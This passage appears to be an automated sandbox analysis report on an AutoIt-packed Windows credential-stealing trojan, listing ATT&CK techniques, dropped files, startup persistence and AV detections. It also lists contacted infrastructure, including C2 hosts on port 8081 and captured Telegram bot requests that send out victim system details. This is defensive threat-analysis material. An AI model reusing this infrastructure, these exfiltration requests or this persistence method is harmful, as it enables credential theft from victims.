                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts                  		2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS127
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets321
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		Cached Domain Credentials111
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Virtualization/Sandbox Evasion                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588893 Sample: ty1nyFUMlo.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 12 other signatures 2->52 8 ty1nyFUMlo.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\...\enterogenous.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 60 Found API chain indicative of sandbox detection 8->60 14 enterogenous.exe 2 8->14         started        62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->62 18 enterogenous.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\enterogenous.vbs, data 14->28 dropped 64 Antivirus detection for dropped file 14->64 66 Multi AV Scanner detection for dropped file 14->66 68 Binary is likely a compiled AutoIt script file 14->68 74 4 other signatures 14->74 20 RegSvcs.exe 15 2 14->20         started        70 Writes to foreign memory regions 18->70 72 Maps a DLL or memory area into another process 18->72 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 mail.acadental.com 3.130.71.34, 49904, 50009, 587 AMAZON-02US United States 20->36 38 api.telegram.org 149.154.167.220, 443, 49853, 49969 TELEGRAMRU United Kingdom 20->38 40 2 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ty1nyFUMlo.exe62%VirustotalBrowse
                  ty1nyFUMlo.exe74%ReversingLabsWin32.Trojan.AutoitInject
                  ty1nyFUMlo.exe100%AviraHEUR/AGEN.1319493
                  ty1nyFUMlo.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\translucently\enterogenous.exe100%AviraHEUR/AGEN.1319493
                  C:\Users\user\AppData\Local\translucently\enterogenous.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\translucently\enterogenous.exe74%ReversingLabsWin32.Trojan.AutoitInject

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://mail.acadental.com100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mail.acadental.com
                  		3.130.71.34
                  		truetrue
                    		unknown
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		high
                      reallyfreegeoip.org
                      		104.21.32.1
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          checkip.dyndns.com
                          		193.122.6.168
                          		truefalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    		high
                                    http://checkip.dyndns.org/false
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/RegSvcs.exe, 00000007.00000002.3794762480.000000000348C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.orgRegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/botenterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.office.com/lBRegSvcs.exe, 00000003.00000002.3795172591.0000000003415000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000007.00000002.3794762480.000000000345B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://varders.kozow.com:8081enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://mail.acadental.comRegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://aborters.duckdns.org:8081enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anotherarmy.dns.army:8081enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.org/qenterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.3795172591.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003456000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.3795172591.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003359000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedenterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://reallyfreegeoip.org/xml/enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              149.154.167.220
                                                                                              		api.telegram.orgUnited Kingdom
                                                                                              		62041TELEGRAMRUfalse
                                                                                              104.21.32.1
                                                                                              		reallyfreegeoip.orgUnited States
                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                              3.130.71.34
                                                                                              		mail.acadental.comUnited States
                                                                                              		16509AMAZON-02UStrue
                                                                                              193.122.6.168
                                                                                              		checkip.dyndns.comUnited States
                                                                                              		31898ORACLE-BMC-31898USfalse

                                                                                              General Information

                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1588893
                                                                                              Start date and time:2025-01-11 06:48:11 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 10m 20s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:11
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:ty1nyFUMlo.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 80%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 99%
                                                                                              • Number of executed functions: 50
                                                                                              • Number of non-executed functions: 309
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target RegSvcs.exe, PID 7496 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              00:49:10API Interceptor13345861x Sleep call for process: RegSvcs.exe modified
                                                                                              05:49:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              149.154.167.220sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  104.21.32.1BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.aziziyeescortg.xyz/2pcx/
                                                                                                                  25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.masterqq.pro/3vdc/
                                                                                                                  QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.mzkd6gp5.top/3u0p/
                                                                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                  • redroomaudio.com/administrator/index.php
                                                                                                                  3.130.71.34RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      193.122.6.168prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • checkip.dyndns.org/

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      reallyfreegeoip.orgsS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.64.1
                                                                                                                      3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.16.1
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.112.1
                                                                                                                      rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.80.1
                                                                                                                      prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.16.1
                                                                                                                      tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.48.1
                                                                                                                      mail.acadental.comRubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 3.130.71.34
                                                                                                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 3.130.71.34
                                                                                                                      s-part-0017.t-0009.t-msedge.net1r3DRyrX0T.exeGet hashmaliciousDarkWatchmanBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      TBUjHBNHaD.exeGet hashmaliciousDarkWatchmanBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      S7s4XhcN1G.exeGet hashmaliciousDarkWatchmanBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      6043249381237528594.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      247624346306918832.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      T1#U5b89#U88c5#U53051.0.1.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      Xre0Nmqk09.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      22736232701915520651.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      53198678114324144.jsGet hashmaliciousStrela DownloaderBrowse
